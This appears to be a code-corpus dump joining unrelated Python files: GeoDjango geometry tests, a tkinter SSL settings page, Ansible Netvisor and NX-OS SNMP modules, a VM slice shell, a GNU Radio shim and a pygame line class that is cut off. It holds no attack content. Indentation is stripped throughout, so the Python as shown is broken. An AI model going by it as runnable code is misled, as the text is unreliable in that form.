qs = Country.objects.scale(xfac, yfac, model_att='scaled')
for c in qs:
for p1, p2 in zip(c.mpoly, c.scaled):
for r1, r2 in zip(p1, p2):
for c1, c2 in zip(r1.coords, r2.coords):
self.assertAlmostEqual(c1[0] * xfac, c2[0], tol)
self.assertAlmostEqual(c1[1] * yfac, c2[1], tol)
@no_mysql
@no_oracle
def test22_translate(self):
"Testing the `translate` GeoQuerySet method."
xfac, yfac = 5, -23
qs = Country.objects.translate(xfac, yfac, model_att='translated')
for c in qs:
for p1, p2 in zip(c.mpoly, c.translated):
for r1, r2 in zip(p1, p2):
for c1, c2 in zip(r1.coords, r2.coords):
# XXX The low precision is for SpatiaLite
self.assertAlmostEqual(c1[0] + xfac, c2[0], 5)
self.assertAlmostEqual(c1[1] + yfac, c2[1], 5)
@no_mysql
def test23_numgeom(self):
"Testing the `num_geom` GeoQuerySet method."
# Both 'countries' only have two geometries.
for c in Country.objects.num_geom(): self.assertEqual(2, c.num_geom)
for c in City.objects.filter(point__isnull=False).num_geom():
# Oracle will return 1 for the number of geometries on non-collections,
# whereas PostGIS will return None.
if postgis:
self.assertEqual(None, c.num_geom)
else:
self.assertEqual(1, c.num_geom)
@no_mysql
@no_spatialite # SpatiaLite can only count vertices in LineStrings
def test24_numpoints(self):
"Testing the `num_points` GeoQuerySet method."
for c in Country.objects.num_points():
self.assertEqual(c.mpoly.num_points, c.num_points)
if not oracle:
# Oracle cannot count vertices in Point geometries.
for c in City.objects.num_points(): self.assertEqual(1, c.num_points)
@no_mysql
def test25_geoset(self):
"Testing the `difference`, `intersection`, `sym_difference`, and `union` GeoQuerySet methods."
geom = Point(5, 23)
tol = 1
qs = Country.objects.all().difference(geom).sym_difference(geom).union(geom)
# XXX For some reason SpatiaLite does something screwey with the Texas geometry here. Also,
# XXX it doesn't like the null intersection.
if spatialite:
qs = qs.exclude(name='Texas')
else:
qs = qs.intersection(geom)
for c in qs:
if oracle:
# Should be able to execute the queries; however, they won't be the same
# as GEOS (because Oracle doesn't use GEOS internally like PostGIS or
# SpatiaLite).
pass
else:
self.assertEqual(c.mpoly.difference(geom), c.difference)
if not spatialite:
self.assertEqual(c.mpoly.intersection(geom), c.intersection)
self.assertEqual(c.mpoly.sym_difference(geom), c.sym_difference)
self.assertEqual(c.mpoly.union(geom), c.union)
@no_mysql
def test26_inherited_geofields(self):
"Test GeoQuerySet methods on inherited Geometry fields."
# Creating a Pennsylvanian city.
mansfield = PennsylvaniaCity.objects.create(name='Mansfield', county='Tioga', point='POINT(-77.071445 41.823881)')
# All transformation SQL will need to be performed on the
# _parent_ table.
qs = PennsylvaniaCity.objects.transform(32128)
self.assertEqual(1, qs.count())
for pc in qs: self.assertEqual(32128, pc.point.srid)
@no_mysql
@no_oracle
@no_spatialite
def test27_snap_to_grid(self):
"Testing GeoQuerySet.snap_to_grid()."
# Let's try and break snap_to_grid() with bad combinations of arguments.
for bad_args in ((), range(3), range(5)):
self.assertRaises(ValueError, Country.objects.snap_to_grid, *bad_args)
for bad_args in (('1.0',), (1.0, None), tuple(map(unicode, range(4)))):
self.assertRaises(TypeError, Country.objects.snap_to_grid, *bad_args)
# Boundary for San Marino, courtesy of Bjorn Sandvik of thematicmapping.org
# from the world borders dataset he provides.
wkt = ('MULTIPOLYGON(((12.41580 43.95795,12.45055 43.97972,12.45389 43.98167,'
'12.46250 43.98472,12.47167 43.98694,12.49278 43.98917,'
'12.50555 43.98861,12.51000 43.98694,12.51028 43.98277,'
'12.51167 43.94333,12.51056 43.93916,12.49639 43.92333,'
'12.49500 43.91472,12.48778 43.90583,12.47444 43.89722,'
'12.46472 43.89555,12.45917 43.89611,12.41639 43.90472,'
'12.41222 43.90610,12.40782 43.91366,12.40389 43.92667,'
'12.40500 43.94833,12.40889 43.95499,12.41580 43.95795)))')
sm = Country.objects.create(name='San Marino', mpoly=fromstr(wkt))
# Because floating-point arithmitic isn't exact, we set a tolerance
# to pass into GEOS `equals_exact`.
tol = 0.000000001
# SELECT AsText(ST_SnapToGrid("geoapp_country"."mpoly", 0.1)) FROM "geoapp_country" WHERE "geoapp_country"."name" = 'San Marino';
ref = fromstr('MULTIPOLYGON(((12.4 44,12.5 44,12.5 43.9,12.4 43.9,12.4 44)))')
self.failUnless(ref.equals_exact(Country.objects.snap_to_grid(0.1).get(name='San Marino').snap_to_grid, tol))
# SELECT AsText(ST_SnapToGrid("geoapp_country"."mpoly", 0.05, 0.23)) FROM "geoapp_country" WHERE "geoapp_country"."name" = 'San Marino';
ref = fromstr('MULTIPOLYGON(((12.4 43.93,12.45 43.93,12.5 43.93,12.45 43.93,12.4 43.93)))')
self.failUnless(ref.equals_exact(Country.objects.snap_to_grid(0.05, 0.23).get(name='San Marino').snap_to_grid, tol))
# SELECT AsText(ST_SnapToGrid("geoapp_country"."mpoly", 0.5, 0.17, 0.05, 0.23)) FROM "geoapp_country" WHERE "geoapp_country"."name" = 'San Marino';
ref = fromstr('MULTIPOLYGON(((12.4 43.87,12.45 43.87,12.45 44.1,12.5 44.1,12.5 43.87,12.45 43.87,12.4 43.87)))')
self.failUnless(ref.equals_exact(Country.objects.snap_to_grid(0.05, 0.23, 0.5, 0.17).get(name='San Marino').snap_to_grid, tol))
@no_mysql
@no_spatialite
def test28_reverse(self):
"Testing GeoQuerySet.reverse_geom()."
coords = [ (-95.363151, 29.763374), (-95.448601, 29.713803) ]
Track.objects.create(name='Foo', line=LineString(coords))
t = Track.objects.reverse_geom().get(name='Foo')
coords.reverse()
self.assertEqual(tuple(coords), t.reverse_geom.coords)
if oracle:
self.assertRaises(TypeError, State.objects.reverse_geom)
@no_mysql
@no_oracle
@no_spatialite
def test29_force_rhr(self):
"Testing GeoQuerySet.force_rhr()."
rings = ( ( (0, 0), (5, 0), (0, 5), (0, 0) ),
( (1, 1), (1, 3), (3, 1), (1, 1) ),
)
rhr_rings = ( ( (0, 0), (0, 5), (5, 0), (0, 0) ),
( (1, 1), (3, 1), (1, 3), (1, 1) ),
)
State.objects.create(name='Foo', poly=Polygon(*rings))
s = State.objects.force_rhr().get(name='Foo')
self.assertEqual(rhr_rings, s.force_rhr.coords)
@no_mysql
@no_oracle
@no_spatialite
def test29_force_rhr(self):
"Testing GeoQuerySet.geohash()."
if not connection.ops.geohash: return
# Reference query:
# SELECT ST_GeoHash(point) FROM geoapp_city WHERE name='Houston';
# SELECT ST_GeoHash(point, 5) FROM geoapp_city WHERE name='Houston';
ref_hash = '9vk1mfq8jx0c8e0386z6'
h1 = City.objects.geohash().get(name='Houston')
h2 = City.objects.geohash(precision=5).get(name='Houston')
self.assertEqual(ref_hash, h1.geohash)
self.assertEqual(ref_hash[:5], h2.geohash)
from test_feeds import GeoFeedTest
from test_regress import GeoRegressionTests
from test_sitemaps import GeoSitemapTest
def suite():
s = unittest.TestSuite()
s.addTest(unittest.makeSuite(GeoModelTest))
s.addTest(unittest.makeSuite(GeoFeedTest))
s.addTest(unittest.makeSuite(GeoSitemapTest))
s.addTest(unittest.makeSuite(GeoRegressionTests))
return s
| bsd-3-clause |
operant/knowledge-management | Server/settings_gui.py | 2 | 6175 | import tkinter as tk
from tkinter import filedialog
from tkinter import *
from tkinter import TOP, E
from Server import home_gui
class SettingsPage(tk.Frame):
def __init__(self, frame, gui):
# parameter: frame
# parameter: gui
"""
Init the frame.
"""
tk.Frame.__init__(self, frame)
"""
Creates a Label to display 'Server Settings'.
"""
label = tk.Label(self, text="Server Settings")
label.pack(side=TOP)
# Frame used for organization
top = tk.Frame(self)
top.pack(side=TOP)
# Frame used for organization
bottom = tk.Frame(self)
bottom.pack(side=BOTTOM)
# http://effbot.org/tkinterbook/radiobutton.htm
certModeText = tk.Label(top, text="SSL Certificate Mode")
certModeText.grid(row=0, sticky=N)
certModes = [
("Automatic Let's Encrypt Certificate", 1),
("Manually Selected Certificate:", 2),
("Self-Signed Certificate (WARNING: INSECURE)", 3)
]
gui.selectedCertMode = IntVar()
gui.selectedCertMode.set(1)
for title, val in certModes:
Radiobutton(self,
text=title,
padx=10,
variable=gui.selectedCertMode,
command=lambda: self.certModeChanged(gui),
value=val).pack(side=TOP, anchor=W)
''''
"""
Creates a Label to display 'Certificate File'.
"""
filenameText = tk.Label(top, text="Certificate File")
filenameText.grid(row=2, sticky=E)
"""
Creates a Entry to display a textbox for the client to enter the name of the file.
"""
self.filenameInput = tk.Entry(top)
self.filenameInput.grid(row=2, column=1)
"""
Creates a Label to display 'Private Key File'.
"""
categoryText = tk.Label(top, text="Private Key File")
categoryText.grid(row=3, sticky=E)
"""
Creates a Entry to display a textbox for the client to enter the category of the file.
"""
self.categoryInput = tk.Entry(top)
self.categoryInput.grid(row=3, column=1)
"""
Creates and adds a select private key file button.
Opens a file-browser window which only accepts a .key file.
"""
uploadButton = tk.Button(bottom, text="Upload",
command=lambda: self.upload(gui,
self.filenameInput.get(),
self.categoryInput.get(),
self.keywordsInput.get()))
uploadButton.grid(row=0)
"""
Creates a Label to display 'Certificate Server Hostname'.
"""
keywordsText = tk.Label(top, text="Certificate Server Hostname")
keywordsText.grid(row=4, sticky=E)
"""
Creates a Entry to display a textbox for the client to enter the keywords of the file.
"""
self.keywordsInput = tk.Entry(top)
self.keywordsInput.grid(row=4, column=1)
"""
Creates and adds a upload button.
Takes all text the client enters and
uploads the file with the corresponding information.
"""
uploadButton = tk.Button(bottom, text="Upload",
command=lambda: self.manually_set_keyfile(gui))
uploadButton.grid(row=0)'''
"""
Creates and adds a back button.
Takes the client back to menu page when clicked on.
"""
backButton = tk.Button(bottom, text="Cancel",
command=lambda: self.back(gui))
backButton.grid(row=2)
def certModeChanged(self, gui):
# Add code in here which enables and distables certain fields
# based upon the selection.
gui.selectedCertMode
if (gui.selectedCertMode.get() == 3):
# Put in fields for Self Signed Certificate
print("IMPLEMENT CERT SETTINGS FOR SELF SIGNED CERTS")
elif (gui.selectedCertMode.get() == 2):
# Put in fields for Manually Selected Certificate
print("IMPLEMENT CERT SETTINGS FOR MANUAL FIELDS")
elif (gui.selectedCertMode.get() == 1):
# Put in fields for Automatic Let's Encrypt Certificate
print("IMPLEMENT CERT SETTINGS FOR AUTOMATIC FIELDS")
def manually_set_certfile(self, gui):
# Open a file window which allows you to select only a '.crt' file and bind the value to the main gui object
gui.certFilename = filedialog.askopenfilename(initialdir="/", title="Select Certificate File",
filetypes=[('Certificate', '.crt')])
def manually_set_keyfile(self, gui):
# Open a file window which allows you to select only a '.key' file and bind the value to the main gui object
gui.keyFilename = filedialog.askopenfilename(initialdir="/", title="Select Private Key File",
filetypes=[('Private Key', '.key')])
def apply_settings(self, gui, filename, category, keywords):
# TODO: Change to use the above methods for setting the keyfiles.
# TODO: Also needs to evenually allow for LE certs and self-signed.
gui.keyFilename = filedialog.askopenfilename(initialdir="/", title="Select file")
print(gui.filename)
self.filenameInput.insert(0, gui.filename)
response = gui.getClient().upload(filename, category, keywords)
"""
Goes back to the home page.
"""
gui.show_frame(home_gui.HomePage)
# self.filenameInput.delete(0, 'end')
# self.categoryInput.delete(0, 'end')
# self.keywordsInput.delete(0, 'end')
def back(self, gui):
# parameter: gui -> The GUI that is being used.
"""
Goes back to the starting page.
"""
gui.show_frame(home_gui.HomePage)
| mit |
pilou-/ansible | test/units/modules/network/netvisor/test_pn_cpu_class.py | 15 | 2855 | # Copyright: (c) 2018, Pluribus Networks
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from units.compat.mock import patch
from ansible.modules.network.netvisor import pn_cpu_class
from units.modules.utils import set_module_args
from .nvos_module import TestNvosModule, load_fixture
class TestCpuClassModule(TestNvosModule):
module = pn_cpu_class
def setUp(self):
self.mock_run_nvos_commands = patch('ansible.modules.network.netvisor.pn_cpu_class.run_cli')
self.run_nvos_commands = self.mock_run_nvos_commands.start()
self.mock_run_check_cli = patch('ansible.modules.network.netvisor.pn_cpu_class.check_cli')
self.run_check_cli = self.mock_run_check_cli.start()
def tearDown(self):
self.mock_run_nvos_commands.stop()
def run_cli_patch(self, module, cli, state_map):
if state_map['present'] == 'cpu-class-create':
results = dict(
changed=True,
cli_cmd=cli
)
elif state_map['absent'] == 'cpu-class-delete':
results = dict(
changed=True,
cli_cmd=cli
)
module.exit_json(**results)
def load_fixtures(self, commands=None, state=None, transport='cli'):
self.run_nvos_commands.side_effect = self.run_cli_patch
if state == 'present':
self.run_check_cli.return_value = False
if state == 'absent':
self.run_check_cli.return_value = True
if state == 'update':
self.run_check_cli.return_value = True
def test_cpu_class_create(self):
set_module_args({'pn_cliswitch': 'sw01', 'pn_name': 'icmp',
'pn_scope': 'local', 'pn_rate_limit': '1000', 'state': 'present'})
result = self.execute_module(changed=True, state='present')
expected_cmd = ' switch sw01 cpu-class-create name icmp scope local rate-limit 1000 '
self.assertEqual(result['cli_cmd'], expected_cmd)
def test_cpu_class_delete(self):
set_module_args({'pn_cliswitch': 'sw01', 'pn_name': 'icmp',
'state': 'absent'})
result = self.execute_module(changed=True, state='absent')
expected_cmd = ' switch sw01 cpu-class-delete name icmp '
self.assertEqual(result['cli_cmd'], expected_cmd)
def test_cpu_class_update(self):
set_module_args({'pn_cliswitch': 'sw01', 'pn_name': 'icmp',
'pn_rate_limit': '2000', 'state': 'update'})
result = self.execute_module(changed=True, state='absent')
expected_cmd = ' switch sw01 cpu-class-modify name icmp rate-limit 2000 '
self.assertEqual(result['cli_cmd'], expected_cmd)
| gpl-3.0 |
GREO/GNU-Radio | usrp/host/swig/usrp_fpga_regs.py | 11 | 1182 | #
# Copyright 2005 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from usrpm import usrp_prims
# Copy everything that starts with FR_ or bmFR_ from the usrp_prims
# name space into our name space. This is effectively a python binding for
# the contents of firmware/include/fpga_regs_common.h and fpga_regs_standard.h
for name in dir(usrp_prims):
if name.startswith("FR_") or name.startswith("bmFR_"):
globals()[name] = usrp_prims.__dict__[name]
| gpl-3.0 |
avlach/univbris-ocf | vt_manager/src/python/vt_manager/communication/sfa/drivers/VTShell.py | 1 | 3868 | from vt_manager.models.VirtualMachine import VirtualMachine
from vt_manager.models.VTServer import VTServer
from vt_manager.models.Action import Action
from vt_manager.models.expiring_components import ExpiringComponents
from vt_manager.communication.sfa.util.xrn import Xrn, hrn_to_urn, get_leaf
from vt_manager.controller.drivers.VTDriver import VTDriver
from vt_manager.communication.sfa.vm_utils.VMSfaManager import VMSfaManager
from vt_manager.communication.sfa.vm_utils.SfaCommunicator import SfaCommunicator
from vt_manager.utils.ServiceThread import ServiceThread
import threading
import time
from vt_manager.controller.dispatchers.xmlrpc.ProvisioningDispatcher import ProvisioningDispatcher
from vt_manager.utils.UrlUtils import UrlUtils
#XXX:To implement SfaCommunicator for a better use of SFA CreateSliver and Start/Stop/Delete/Update slice
#from vt_manager.common.middleware.thread_local import thread_locals, push
#from multiprocessing import Pipe
class VTShell:
def __init__(self):
pass
def GetNodes(self,slice=None,authority=None,uuid=None):
servers = VTServer.objects.all()
if uuid:
for server in servers:
if str(server.uuid) == str(uuid):
return server
return None
if not slice:
return servers
else:
slice_servers = list()
for server in servers:
vms = server.getChildObject().getVMs(sliceName=slice, projectName = authority)
if vms:
slice_servers.append(server)
return slice_servers
def GetSlice(self,slicename,authority):
name = slicename # or uuid...
servers = self.GetNodes()
slices = dict()
List = list()
for server in servers:
child_server = server.getChildObject()
vms = child_server.getVMs(sliceName=name, projectName = authority)
for vm in vms:
List.append({'vm-name':vm.name,'vm-state':vm.state,'vm-id':vm.id, 'node-id':server.uuid, 'node-name':server.name})
slices['vms'] = List
return slices
def StartSlice(self,server_uuid,vm_id):
return self.__crudVM(server_uuid,vm_id,Action.PROVISIONING_VM_START_TYPE)
def StopSlice(self,server_uuid,vm_id):
return self.__crudVM(server_uuid,vm_id,Action.PROVISIONING_VM_STOP_TYPE)
def RebootSlice(self,server_uuid,vm_id):
return self.__crudVM(server_uuid,vm_id,Action.PROVISIONING_VM_REBOOT_TYPE)
def DeleteSlice(self,server_uuid,vm_id):
return self.__crudVM(server_uuid,vm_id,Action.PROVISIONING_VM_DELETE_TYPE)
def __crudVM(self,server_uuid,vm_id,action):
try:
VTDriver.PropagateActionToProvisioningDispatcher(vm_id, server_uuid, action)
except Exception as e:
raise e
return 1
def CreateSliver(self,vm_params,projectName,sliceName,expiration):
#processes = list()
provisioningRSpecs = VMSfaManager.getActionInstance(vm_params,projectName,sliceName)
for provisioningRSpec in provisioningRSpecs:
#waiter,event = Pipe()
#process = SfaCommunicator(provisioningRSpec.action[0].id,event,provisioningRSpec)
#processes.append(process)
#process.start()
ServiceThread.startMethodInNewThread(ProvisioningDispatcher.processProvisioning,provisioningRSpec,'SFA.OCF.VTM') #UrlUtils.getOwnCallbackURL())
if expiration:
ExpiringComponents.objects.create(slice=sliceName, authority=projectName, expires=expiration).save()
#waiter.recv()
return 1
def GetSlices(server_id,user=None):
#TODO: Get all the vms from a node and from an specific user
pass
def convert_to_uuid(self,requested_attributes):
for slivers in requested_attributes:
servers = VTServer.objects.filter(name=get_leaf(slivers['component_id']))
slivers['component_id'] = servers[0].uuid
return requested_attributes
| bsd-3-clause |
valentin-krasontovitsch/ansible | lib/ansible/modules/network/nxos/nxos_snmp_host.py | 68 | 15264 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: nxos_snmp_host
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Manages SNMP host configuration.
description:
- Manages SNMP host configuration parameters.
author:
- Jason Edelman (@jedelman8)
- Gabriele Gerbino (@GGabriele)
notes:
- Tested against NXOSv 7.3.(0)D1(1) on VIRL
- C(state=absent) removes the host configuration if it is configured.
options:
snmp_host:
description:
- IP address of hostname of target host.
required: true
version:
description:
- SNMP version. If this is not specified, v1 is used.
choices: ['v1', 'v2c', 'v3']
v3:
description:
- Use this when verion is v3. SNMPv3 Security level.
choices: ['noauth', 'auth', 'priv']
community:
description:
- Community string or v3 username.
udp:
description:
- UDP port number (0-65535).
default: 162
snmp_type:
description:
- type of message to send to host. If this is not
specified, trap type is used.
choices: ['trap', 'inform']
vrf:
description:
- VRF to use to source traffic to source.
If state = absent, the vrf is removed.
vrf_filter:
description:
- Name of VRF to filter.
If state = absent, the vrf is removed from the filter.
src_intf:
description:
- Source interface. Must be fully qualified interface name.
If state = absent, the interface is removed.
state:
description:
- Manage the state of the resource. If state = present, the
host is added to the configuration. If only vrf and/or
vrf_filter and/or src_intf are given, they will be added to
the existing host configuration. If state = absent, the
host is removed if community parameter is given. It is possible
to remove only vrf and/or src_int and/or vrf_filter
by providing only those parameters and no community parameter.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
# ensure snmp host is configured
- nxos_snmp_host:
snmp_host: 192.0.2.3
community: TESTING
state: present
'''
RETURN = '''
commands:
description: commands sent to the device
returned: always
type: list
sample: ["snmp-server host 192.0.2.3 filter-vrf another_test_vrf"]
'''
import re
from ansible.module_utils.network.nxos.nxos import load_config, run_commands
from ansible.module_utils.network.nxos.nxos import nxos_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
def execute_show_command(command, module):
command = {
'command': command,
'output': 'json',
}
return run_commands(module, command)
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
value = table.get(key)
if value:
new_dict[new_key] = str(value)
else:
new_dict[new_key] = value
return new_dict
def flatten_list(command_lists):
flat_command_list = []
for command in command_lists:
if isinstance(command, list):
flat_command_list.extend(command)
else:
flat_command_list.append(command)
return flat_command_list
def get_snmp_host(host, udp, module):
body = execute_show_command('show snmp host', module)
host_map = {
'port': 'udp',
'version': 'version',
'level': 'v3',
'type': 'snmp_type',
'secname': 'community'
}
host_map_5k = {
'port': 'udp',
'version': 'version',
'sec_level': 'v3',
'notif_type': 'snmp_type',
'commun_or_user': 'community'
}
resource = {}
if body:
try:
resource_table = body[0]['TABLE_host']['ROW_host']
if isinstance(resource_table, dict):
resource_table = [resource_table]
for each in resource_table:
key = str(each['host']) + '_' + str(each['port']).strip()
src = each.get('src_intf')
host_resource = apply_key_map(host_map, each)
if src:
host_resource['src_intf'] = src
if re.search(r'interface:', src):
host_resource['src_intf'] = src.split(':')[1].strip()
vrf_filt = each.get('TABLE_vrf_filters')
if vrf_filt:
vrf_filter = vrf_filt['ROW_vrf_filters']['vrf_filter'].split(':')[1].split(',')
filters = [vrf.strip() for vrf in vrf_filter]
host_resource['vrf_filter'] = filters
vrf = each.get('vrf')
if vrf:
host_resource['vrf'] = vrf.split(':')[1].strip()
resource[key] = host_resource
except KeyError:
# Handle the 5K case
try:
resource_table = body[0]['TABLE_hosts']['ROW_hosts']
if isinstance(resource_table, dict):
resource_table = [resource_table]
for each in resource_table:
key = str(each['address']) + '_' + str(each['port']).strip()
src = each.get('src_intf')
host_resource = apply_key_map(host_map_5k, each)
if src:
host_resource['src_intf'] = src
if re.search(r'interface:', src):
host_resource['src_intf'] = src.split(':')[1].strip()
vrf = each.get('use_vrf_name')
if vrf:
host_resource['vrf'] = vrf.strip()
vrf_filt = each.get('TABLE_filter_vrf')
if vrf_filt:
vrf_filter = vrf_filt['ROW_filter_vrf']['filter_vrf_name'].split(',')
filters = [vrf.strip() for vrf in vrf_filter]
host_resource['vrf_filter'] = filters
resource[key] = host_resource
except (KeyError, AttributeError, TypeError):
return resource
except (AttributeError, TypeError):
return resource
find = resource.get(host + '_' + udp)
if find:
fix_find = {}
for (key, value) in find.items():
if isinstance(value, str):
fix_find[key] = value.strip()
else:
fix_find[key] = value
return fix_find
return {}
def remove_snmp_host(host, udp, existing):
commands = []
if existing['version'] == 'v3':
existing['version'] = '3'
command = 'no snmp-server host {0} {snmp_type} version \
{version} {v3} {community} udp-port {1}'.format(host, udp, **existing)
elif existing['version'] == 'v2c':
existing['version'] = '2c'
command = 'no snmp-server host {0} {snmp_type} version \
{version} {community} udp-port {1}'.format(host, udp, **existing)
elif existing['version'] == 'v1':
existing['version'] = '1'
command = 'no snmp-server host {0} {snmp_type} version \
{version} {community} udp-port {1}'.format(host, udp, **existing)
if command:
commands.append(command)
return commands
def remove_vrf(host, udp, proposed, existing):
commands = []
if existing.get('vrf'):
commands.append('no snmp-server host {0} use-vrf \
{1} udp-port {2}'.format(host, proposed.get('vrf'), udp))
return commands
def remove_filter(host, udp, proposed, existing):
commands = []
if existing.get('vrf_filter'):
if proposed.get('vrf_filter') in existing.get('vrf_filter'):
commands.append('no snmp-server host {0} filter-vrf \
{1} udp-port {2}'.format(host, proposed.get('vrf_filter'), udp))
return commands
def remove_src(host, udp, proposed, existing):
commands = []
if existing.get('src_intf'):
commands.append('no snmp-server host {0} source-interface \
{1} udp-port {2}'.format(host, proposed.get('src_intf'), udp))
return commands
def config_snmp_host(delta, udp, proposed, existing, module):
commands = []
command_builder = []
host = proposed['snmp_host']
cmd = 'snmp-server host {0}'.format(proposed['snmp_host'])
snmp_type = delta.get('snmp_type')
version = delta.get('version')
ver = delta.get('v3')
community = delta.get('community')
command_builder.append(cmd)
if any([snmp_type, version, ver, community]):
type_string = snmp_type or existing.get('type')
if type_string:
command_builder.append(type_string)
version = version or existing.get('version')
if version:
if version == 'v1':
vn = '1'
elif version == 'v2c':
vn = '2c'
elif version == 'v3':
vn = '3'
version_string = 'version {0}'.format(vn)
command_builder.append(version_string)
if ver:
ver_string = ver or existing.get('v3')
command_builder.append(ver_string)
if community:
community_string = community or existing.get('community')
command_builder.append(community_string)
udp_string = ' udp-port {0}'.format(udp)
command_builder.append(udp_string)
cmd = ' '.join(command_builder)
commands.append(cmd)
CMDS = {
'vrf_filter': 'snmp-server host {0} filter-vrf {vrf_filter} udp-port {1}',
'vrf': 'snmp-server host {0} use-vrf {vrf} udp-port {1}',
'src_intf': 'snmp-server host {0} source-interface {src_intf} udp-port {1}'
}
for key in delta:
command = CMDS.get(key)
if command:
cmd = command.format(host, udp, **delta)
commands.append(cmd)
return commands
def main():
argument_spec = dict(
snmp_host=dict(required=True, type='str'),
community=dict(type='str'),
udp=dict(type='str', default='162'),
version=dict(choices=['v1', 'v2c', 'v3']),
src_intf=dict(type='str'),
v3=dict(choices=['noauth', 'auth', 'priv']),
vrf_filter=dict(type='str'),
vrf=dict(type='str'),
snmp_type=dict(choices=['trap', 'inform']),
state=dict(choices=['absent', 'present'], default='present'),
)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
warnings = list()
check_args(module, warnings)
results = {'changed': False, 'commands': [], 'warnings': warnings}
snmp_host = module.params['snmp_host']
community = module.params['community']
udp = module.params['udp']
version = module.params['version']
src_intf = module.params['src_intf']
v3 = module.params['v3']
vrf_filter = module.params['vrf_filter']
vrf = module.params['vrf']
snmp_type = module.params['snmp_type']
state = module.params['state']
existing = get_snmp_host(snmp_host, udp, module)
if version is None:
if existing:
version = existing.get('version')
else:
version = 'v1'
if snmp_type is None:
if existing:
snmp_type = existing.get('snmp_type')
else:
snmp_type = 'trap'
if v3 is None:
if version == 'v3' and existing:
v3 = existing.get('v3')
if snmp_type == 'inform' and version == 'v1':
module.fail_json(msg='inform requires snmp v2c or v3')
if (version == 'v1' or version == 'v2c') and v3:
module.fail_json(msg='param: "v3" should not be used when '
'using version v1 or v2c')
if not any([vrf_filter, vrf, src_intf]):
if not all([snmp_type, version, community, udp]):
module.fail_json(msg='when not configuring options like '
'vrf_filter, vrf, and src_intf,'
'the following params are required: '
'type, version, community')
if version == 'v3' and v3 is None:
module.fail_json(msg='when using version=v3, the param v3 '
'(options: auth, noauth, priv) is also required')
# existing returns the list of vrfs configured for a given host
# checking to see if the proposed is in the list
store = existing.get('vrf_filter')
if existing and store:
if vrf_filter not in existing['vrf_filter']:
existing['vrf_filter'] = None
else:
existing['vrf_filter'] = vrf_filter
commands = []
args = dict(
community=community,
snmp_host=snmp_host,
udp=udp,
version=version,
src_intf=src_intf,
vrf_filter=vrf_filter,
v3=v3,
vrf=vrf,
snmp_type=snmp_type
)
proposed = dict((k, v) for k, v in args.items() if v is not None)
if state == 'absent' and existing:
if proposed.get('community'):
commands.append(remove_snmp_host(snmp_host, udp, existing))
else:
if proposed.get('src_intf'):
commands.append(remove_src(snmp_host, udp, proposed, existing))
if proposed.get('vrf'):
commands.append(remove_vrf(snmp_host, udp, proposed, existing))
if proposed.get('vrf_filter'):
commands.append(remove_filter(snmp_host, udp, proposed, existing))
elif state == 'present':
delta = dict(set(proposed.items()).difference(existing.items()))
if delta:
command = config_snmp_host(delta, udp, proposed, existing, module)
commands.append(command)
cmds = flatten_list(commands)
if cmds:
results['changed'] = True
if not module.check_mode:
load_config(module, cmds)
if 'configure' in cmds:
cmds.pop(0)
results['commands'] = cmds
module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 |
Akson/RemoteConsolePlus3 | RemoteConsolePlus3/RCP3/Backends/Processors/HtmlFormatting/Text2Html.py | 1 | 1398 | #Created by Dmytro Konobrytskyi, 2013 (github.com/Akson)
class Backend(object):
def __init__(self, parentNode):
self._parentNode = parentNode
def Delete(self):
"""
This method is called when a parent node is deleted.
"""
pass
def GetParameters(self):
"""
Returns a dictionary with object parameters, their values,
limits and ways to change them.
"""
return {}
def SetParameters(self, parameters):
"""
Gets a dictionary with parameter values and
update object parameters accordingly
"""
pass
def ProcessMessage(self, message):
"""
This message is called when a new message comes.
If an incoming message should be processed by following nodes, the
'self._parentNode.SendMessage(message)'
should be called with an appropriate message.
"""
processedMessage = {"Stream":message["Stream"], "Info":message["Info"]}
data = '<pre class="messageText">'+str(message["Data"])+'</pre>'
processedMessage["Data"] = data
self._parentNode.SendMessage(processedMessage)
def AppendContextMenuItems(self, menu):
"""
Append backend specific menu items to a context menu that user will see
when he clicks on a node.
"""
pass | lgpl-3.0 |
Saevon/Arkanoid | Line.py | 1 | 5192 | import pygame
from Vector import *
from LineSegment import *
class Barrier_Lines(pygame.sprite.Group):
def __init__(self):
pygame.sprite.Group.__init__(self)
self.lines = []
def new_line(self, pos1, pos2):
line = Line(pos1, pos2)
self.lines.append(line)
self.add(line)
def collide(self, point, vector):
closest = None
for line in self.lines:
if line in self:
temp = line.hit(point, vector)
if temp:
if not closest:
closest = temp
elif abs(temp[0][0] - point[0]) + abs(temp[0][1] - point[1]) < abs(closest[0][0] - point[0]) + abs(closest[0][1] - point[1]):
closest = temp
elif int(abs(temp[0][0] - point[0]) + abs(temp[0][1]) - point[1]) == int(abs(closest[0][0] - point[0]) + abs(closest[0][1] - point[1])):
temp = (temp[0], temp[1] + closest[1])
closest = temp
else:
self.lines.remove(line)
return closest
def kill_all(self, point):
